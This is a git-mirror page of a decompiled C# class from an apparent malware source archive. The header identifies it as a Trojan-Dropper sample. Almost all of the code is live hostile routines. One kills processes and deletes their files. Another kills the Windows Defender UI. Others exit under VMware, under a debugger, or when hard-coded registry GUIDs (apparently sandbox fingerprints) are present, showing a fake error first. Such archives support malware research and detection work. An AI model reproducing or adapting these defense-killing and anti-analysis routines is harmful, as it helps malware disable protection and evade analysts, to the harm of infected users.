mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
f2ac1ece55
add
110 lines
3.3 KiB
C#
110 lines
3.3 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: FTPscanner.C1
|
|
// Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Runtime.InteropServices;
|
|
using System.Windows.Forms;
|
|
|
|
namespace FTPscanner
|
|
{
|
|
internal class C1
|
|
{
|
|
public static void A(string process, bool delete)
|
|
{
|
|
process = process.Replace(".exe", "");
|
|
try
|
|
{
|
|
foreach (Process process1 in Process.GetProcesses())
|
|
{
|
|
if (!(process1.ProcessName != process))
|
|
{
|
|
try
|
|
{
|
|
Process process2 = process1;
|
|
process2.Kill();
|
|
if (delete)
|
|
File.Delete(process2.Modules[0].FileName);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
public static void B()
|
|
{
|
|
foreach (Process process in Process.GetProcesses())
|
|
{
|
|
if (process.ProcessName.Contains("MSASCui") && process.MainModule.FileName != Process.GetCurrentProcess().MainModule.FileName)
|
|
{
|
|
try
|
|
{
|
|
process.Kill();
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
if (process.ProcessName.Contains("VMware") && process.MainModule.FileName != Process.GetCurrentProcess().MainModule.FileName)
|
|
Environment.Exit(0);
|
|
}
|
|
if (Process.GetCurrentProcess().MainModule.FileName.Contains("sample") || Process.GetCurrentProcess().MainModule.FileName.Equals("test"))
|
|
Environment.Exit(0);
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Identities");
|
|
if (registryKey == null)
|
|
return;
|
|
switch (registryKey.GetValue("Default User ID").ToString())
|
|
{
|
|
case "{177D2F0D-C2B1-4AA1-869C-A61C307B18FF}":
|
|
int num1 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
case "{4268CD90-4AAD-4A75-AC89-343E4A0E5134}":
|
|
int num2 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
case "{095F0392-95AE-4379-8528-558D4F23DDD0}":
|
|
int num3 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
case "{42D8066E-F069-48E2-9549-21646EC1BC68}":
|
|
int num4 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
case "{0A6F0A56-D860-4E67-9D82-0606D95E5431}":
|
|
int num5 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
case "{ED68B8B4-272F-4218-82F0-17F591FA2FA7}":
|
|
int num6 = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
break;
|
|
}
|
|
}
|
|
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
|
|
internal static extern bool IsDebuggerPresent();
|
|
|
|
public static bool C()
|
|
{
|
|
if (C1.IsDebuggerPresent())
|
|
{
|
|
int num = (int) MessageBox.Show("Error 0x069");
|
|
Environment.Exit(0);
|
|
}
|
|
return false;
|
|
}
|
|
}
|
|
}
|